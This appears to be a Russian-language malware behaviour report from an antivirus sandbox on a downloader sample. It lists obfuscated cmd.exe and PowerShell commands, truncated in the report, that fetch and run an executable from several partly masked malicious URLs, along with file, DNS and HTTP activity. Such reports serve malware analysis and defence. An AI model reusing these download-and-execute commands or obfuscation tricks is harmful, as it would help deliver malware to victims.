Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:ON\C"set c8UG=;'hTZ'=kBj$}}{hctac}};kaerb;'jmv'=zfU$;prh$ metI-ekovnI{ )00008 eg- htgnel.)prh$ metI-teG(( fI;'nJW'=pQK$;)prh$ ,rHq$(eliFdaolnwoD.Qzb${...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\198.exe
Удаляет следующие файлы
- %TEMP%\198.exe
Сетевая активность
Подключается к
- 'sa#####.leadseven.com':80
- 'ia####rasil.com.br':80
- 'gr######ationgiveaways.com':80
- 'pr######persianas.com.br':80
- '2d#3.ru':80
TCP
Запросы HTTP GET
- http://sa#####.leadseven.com/HAb
- http://ia####rasil.com.br/m9Fg
- http://gr######ationgiveaways.com/aMLy
- http://pr######persianas.com.br/QlltYOUC
- http://2d#3.ru/cc6rkI
UDP
- DNS ASK sa#####.leadseven.com
- DNS ASK ia####rasil.com.br
- DNS ASK gr######ationgiveaways.com
- DNS ASK pr######persianas.com.br
- DNS ASK 2d#3.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:ON\C"set c8UG=;'hTZ'=kBj$}}{hctac}};kaerb;'jmv'=zfU$;prh$ metI-ekovnI{ )00008 eg- htgnel.)prh$ metI-teG(( fI;'nJW'=pQK$;)prh$ ,rHq$(eliFdaolnwoD.Qzb${...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:ON/C"set c8UG=;'hTZ'=kBj$}}{hctac}};kaerb;'jmv'=zfU$;prh$ metI-ekovnI{ )00008 eg- htgnel.)prh$ metI-teG(( fI;'nJW'=pQK$;)prh$ ,rHq$(eliFdaolnwoD.Qzb${yrt{)NGi$ ni rHq$(hcaerof;'exe.'+DBw$+'\...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo $EiW='Wzo';$bzQ=new-object Net.WebClient;$iGN='http://sa#####.leadseven.com/HAb@http://iantdbrasil.com.br/m9Fg@http://greatvacationgiveaways.com/aMLy@http://progettopersianas.com...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
